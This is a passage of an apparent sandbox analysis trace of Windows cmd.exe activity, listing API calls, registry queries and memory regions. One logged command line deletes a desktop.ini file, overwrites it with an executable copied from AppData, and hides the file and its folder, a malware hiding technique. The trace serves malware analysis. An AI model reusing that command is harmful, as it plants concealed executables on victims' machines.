nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, 
lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, 
lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.631] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.632] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0132.632] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] 
GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.633] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x32, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | 
out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x32, lpOverlapped=0x0) returned 1 [0132.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.634] _close (_FileHandle=4) returned 0 [0132.634] FindNextFileW (in: hFindFile=0x2a0e70, lpFindFileData=0x26f474 | out: lpFindFileData=0x26f474) returned 0 [0132.634] GetLastError () returned 0x12 [0132.634] FindClose (in: hFindFile=0x2a0e70 | out: hFindFile=0x2a0e70) returned 1 [0132.634] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0132.781] _close (_FileHandle=3) returned 0 [0132.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.781] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.781] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.781] SetConsoleInputExeNameW () returned 0x1 [0132.781] GetConsoleOutputCP () returned 0x1b5 [0132.781] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.781] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.782] exit (_Code=0) Process: id = "117" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12506 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12507 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 12508 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 12509 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 12510 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12511 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12512 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12513 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12514 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12515 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12566 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12567 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12568 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12569 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12570 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12571 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12572 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = 
mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12576 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12577 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12578 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 12579 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12580 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12581 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 12582 start_va = 0x160000 
end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 12583 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12584 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12585 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 12586 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 12587 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 12641 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 174 os_tid = 0xbf0 [0132.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa1c | out: lpSystemTimeAsFileTime=0x12fa1c*(dwLowDateTime=0x88ff81e0, dwHighDateTime=0x1d440a9)) [0132.654] GetCurrentProcessId () returned 0xa70 [0132.654] GetCurrentThreadId () returned 0xbf0 [0132.654] GetTickCount () returned 0x2a311 [0132.654] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa14 | out: lpPerformanceCount=0x12fa14*=18944294206) returned 1 [0132.654] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.654] __set_app_type (_Type=0x1) [0132.654] __p__fmode () returned 0x76b331f4 [0132.654] __p__commode () returned 0x76b331fc [0132.654] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.655] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.655] GetCurrentThreadId () returned 0xbf0 [0132.655] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbf0) returned 0x38 [0132.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.655] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.655] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.655] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f9ac | out: phkResult=0x12f9ac*=0x0) returned 0x2 [0132.655] VirtualQuery (in: lpAddress=0x12f9e3, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x130000, AllocationBase=0x130000, 
AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.655] GetConsoleOutputCP () returned 0x1b5 [0132.655] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.655] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.655] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.656] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.656] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.656] GetEnvironmentStringsW () returned 0x1c0480* [0132.656] FreeEnvironmentStringsW (penv=0x1c0480) returned 1 [0132.656] GetEnvironmentStringsW () returned 0x1c0480* [0132.657] FreeEnvironmentStringsW (penv=0x1c0480) returned 1 [0132.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e91c | out: phkResult=0x12e91c*=0x40) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x30, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x0, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegCloseKey (hKey=0x40) returned 0x0 [0132.657] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e91c | out: phkResult=0x12e91c*=0x40) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e924, 
